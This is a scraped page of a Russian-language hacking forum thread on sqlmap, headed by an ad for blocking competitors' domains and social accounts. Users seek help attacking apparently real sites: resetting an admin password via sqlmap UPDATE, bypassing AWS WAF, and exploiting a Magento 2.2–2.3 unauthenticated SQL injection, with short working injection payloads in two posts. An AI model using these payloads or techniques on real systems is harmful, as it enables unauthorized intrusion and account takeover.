УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Вопросы по SQLMap

Страница 108 из 115

108

Опции темы

Поиск в этой теме

Опции просмотра

#1071

23.09.2020, 01:39

karkajoi

Guest

Сообщений: n/a

Провел на форуме:
96779

Репутация: 5

Цитата:

Сообщение от Gutman999

Gutman999 said:
↑
Не совсем понял тебя друже. Ты имеешь ввиду php code injection? Я с этим не знаком

Ну да, это дает больше профита чем иньекция, но верить акуше я бы не стал

#1072

23.09.2020, 08:54

Gutman999

Guest

Сообщений: n/a

Провел на форуме:
3379

Репутация: 0

Цитата:

Сообщение от karkajoi

karkajoi said:
↑
Ну да, это дает больше профита чем иньекция, но верить акуше я бы не стал

А как эту уязвимость реализовать не подскажешь? Мана нету случайно?

#1073

23.09.2020, 09:27

eminlayer7788

Guest

Сообщений: n/a

Провел на форуме:
36807

Репутация: 1

Цитата:

Сообщение от Gutman999

Gutman999 said:
↑
А как эту уязвимость реализовать не подскажешь? Мана нету случайно?

https://github.com/sqlmapproject/sqlmap/wiki/Usage

#1074

01.10.2020, 01:20

sosidzh24

Guest

Сообщений: n/a

Провел на форуме:
5258

Репутация: 0

--is-dba: True. Могу я изменить пароль админа? Какая команда должна быть? Есть несколько баз данных, текущая 'admin' в ней таблица 'users' и колонку пароль 'password'.

Я попробовал так --sql-query "UPDATE users SET password = '123' WHERE email = 'admin@admin.com';" Выбило ошибку "execution of non-query SQL statements is only available when stacked queries are supported". Как правильно сделать?

#1075

22.10.2020, 17:42

madam

Guest

Сообщений: n/a

Провел на форуме:
50513

Репутация: 1

Цитата:

Сообщение от sosidzh24

sosidzh24 said:
↑
--is-dba: True. Могу я изменить пароль админа? Какая команда должна быть? Есть несколько баз данных, текущая 'admin' в ней таблица 'users' и колонку пароль 'password'.
Я попробовал так --sql-query "UPDATE users SET password = '123' WHERE email = '
admin@admin.com
';" Выбило ошибку "execution of non-query SQL statements is only available when stacked queries are supported". Как правильно сделать?

PHP не поддерживает стек запросов, когда СУБД является MySQL

#1076

26.10.2020, 15:42

brown

Guest

Сообщений: n/a

Провел на форуме:
43449

Репутация: 1

как обойти WAF/IPS identified as 'AWS WAF (Amazon)'

Array

(

[0] => Array

(

[0] => 42000

[SQLSTATE] => 42000

[1] => 8114

Код:

Code:
=> 8114
            [2] => [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]Error converting data type nvarchar to int.
            [message] => [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]Error converting data type nvarchar to int.
        )

)

#1077

03.11.2020, 11:28

Gigggs

Guest

Сообщений: n/a

Провел на форуме:
3469

Репутация: 0

Подскажите пожалуйста , Акунетикс нашел вот такую уязвимость Magento (2.2.0 to 2.3.0) Unauthenticated SQL Injection Vulnerability

нашел видос и пару статей как раскрутить

вот к примеру

но ничего не выходт

вот как выглядит

https:// site.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+3 *3>8)+--+-

или я что то не так делаю, может кто подскажет какие варианты еще есть или команды, или там вообще нет уязвимости

#1078

03.11.2020, 20:18

fandor9

Guest

Сообщений: n/a

Провел на форуме:
169390

Репутация: 47

Цитата:

Сообщение от Gigggs

Gigggs said:
↑
Подскажите пожалуйста , Акунетикс нашел вот такую уязвимость Magento (2.2.0 to 2.3.0) Unauthenticated SQL Injection Vulnerability
нашел видос и пару статей как раскрутить
вот к примеру
но ничего не выходт
вот как выглядит
https:// site.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+3 *3
>8)+--+-
или я что то не так делаю, может кто подскажет какие варианты еще есть или команды, или там вообще нет уязвимости

Гадать на кофейной гуще?

Что вам говорит site/magento_version

Что получаете в ответ когда шлёте

Код:

Code:
)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+1=1)+--+-

и что получаете

Код:

Code:
)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+1=0)+--+-

Первоисточник

#1079

03.11.2020, 21:12

Octavian

Guest

Сообщений: n/a

Провел на форуме:
97114

Репутация: 24

Привет помогите!

Через SQLmap в PostgreSQL создал --sql-shell как мне сохранить output запросов?

SQLmap стандартным способом сохраняет но через --dump мне не выдает ничего только через sql-shell

#1080

10.11.2020, 12:27

Gigggs

Guest

Сообщений: n/a

Провел на форуме:
3469

Репутация: 0

подскажите , че это такое?

available databases [7]:
[*] `\\xfc@\xdc\xff\xfbt\xb7?\xfd\xff\xff\xa0? "@>@?\xf1W\x8f\xa0#\xff\x90@\xf2?\xfe\xe8\xff\xc8\ xf9\xf9\xe4c\xfa;7:\xbc\x80\xeb\x83\xf`
[*] `\xfc\xff\xc8\xf3\xfc\xa0\xe3\xe4\xd0?\xff\xc8\xff \x84>1\xe2\x909\xfc

\xfe?\xca\xd8+\xf0V`
[*] `\xfc \xc8\xfcD\x81▒\xff\xe8\xff\xf8\xff \x85 \xc4\xff\x9f\xfa\xf3\xf1NH\xe3\xe2\xb9 \xa2\xe1

\x801\xfb\xa0`
[*] `\xfc \xff\xff\xfa\xbf\xc8?\x8f ? ?\xff\xfa$8\xff\xfb?\xff\xe4\xff\xff\xfe1 \xff\xfc\xe1G\xf9^\xe0\xffq\xc1`